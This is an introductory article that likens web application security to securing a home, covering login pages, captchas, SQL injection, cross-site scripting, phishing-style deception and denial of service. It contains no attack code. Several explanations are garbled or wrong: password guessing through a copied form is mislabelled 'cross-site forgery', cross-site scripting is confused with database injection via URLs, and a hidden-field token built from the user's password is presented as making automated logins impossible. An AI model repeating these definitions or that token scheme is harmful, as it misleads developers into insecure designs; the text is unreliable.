Secure your web app like your own home

An easy way to see web application security is to imagine your own home. It has a front door, a back door, windows, several rooms, a roof, perimeter fences and different access routes. Only the terminology is different.

The front door.
The front door of any web application is the login page and, unsurprisingly, it is the main point of attack. A login page will consist of edit boxes to enter a username and password and a button to send them to the server to authenticate your access to the rest of the web application. Some login pages may provide a captcha to ensure you are a human and not a mockup of the same form on a different server. The test form will cycle through variations of usernames and passwords until it gains access to the application. This is known as cross-site forgery and is similar to a thief forging your house keys.

Captchas are jumbled images of scrambled letters and numbers that make it impossible to read an automated script. Unfortunately, as scripts get smarter at reading these images, captcha images should get more complex and harder for humans to read. This causes frustration for the end user as they have repeated failed attempts to access their account because the captcha was unreadable. The solution to this has been to replace the captcha with a secure token. The secure token is generated by matching the username, password, and any other available user information with a uniquely generated key. This concatenation is then encrypted and stored as a hidden field in the form, making it impossible for any test form to make a successful login attempt.

The windows and the back door.
What are the windows of a web application? I don’t mean the operating system on the server. I’m talking about potential areas of each page that could be broken to make a forced entry. These areas are edit boxes and text areas that allow the user to type information. An attacker will use edit boxes and text areas to enter commands that the database understands. If the software is not written securely, it is very easy to break the database when it is saving the data, so that it executes the commands provided by the attacker. Typical attacks can result in database destruction, data theft, or compromise of user information. This type of attack is known as SQL injection.

border fences.
The boundaries of a web page are the links, the editable areas, and the main URL. The URL of the page itself and the links embedded in the page can be copied and modified from another site so that the server can execute the commands. Javascript code can be inserted into editable areas to force data to be sent to an unauthorized site or to gain control of the user’s web browser. Database commands can also be inserted into the main URL. These attacks are known as cross-site scripting (XSS) attacks because they are scripts that direct the user to the attacker’s website. XSS attacks could be used to steal a user’s authenticated session ID and use it to increase the access level of another account they have already created.

To prevent cross-site scripting, the software should scan all editable areas for code and also include a secure token in each URL and link. Just as holes and gaps in fences should be closed. All secure pages must verify the existence of an authenticated user.

Interpretation.
We have all experienced bogus calls to your home claiming to be the gas man or the water company saying they need access to your home to shut off your supply. Website attackers can contact you or any other user of your site via email, social network, or phone and trick you into revealing your login details. The reasons they might give could be that your website has already been hacked and they can fix it if you give them access. The only prevention is to constantly remind your users not to reveal their username and password to anyone and that you, as the owner of the site, will never ask them to reveal their password. You should provide links that allow your users to reset forgotten passwords by sending them an email link with an encrypted token to ensure its origin.

Brute force input.
The simplest and fastest method of entry for any burglar to enter a home is to use a crowbar to pry open a door or break a window with a brick.
The high-tech version of this method is the denial of service (DoS) attack. A DoS attack involves repeatedly targeting a web page until the web server runs out of memory and shuts down.

As the number of thieves decreases, the number of hackers increases. A thief may have only sought financial gain, while a hacker’s motivation could be political, financial, or simply malicious damage. They may never break into a house without any protection, but it is a certainty that an unsecured website will eventually be attacked.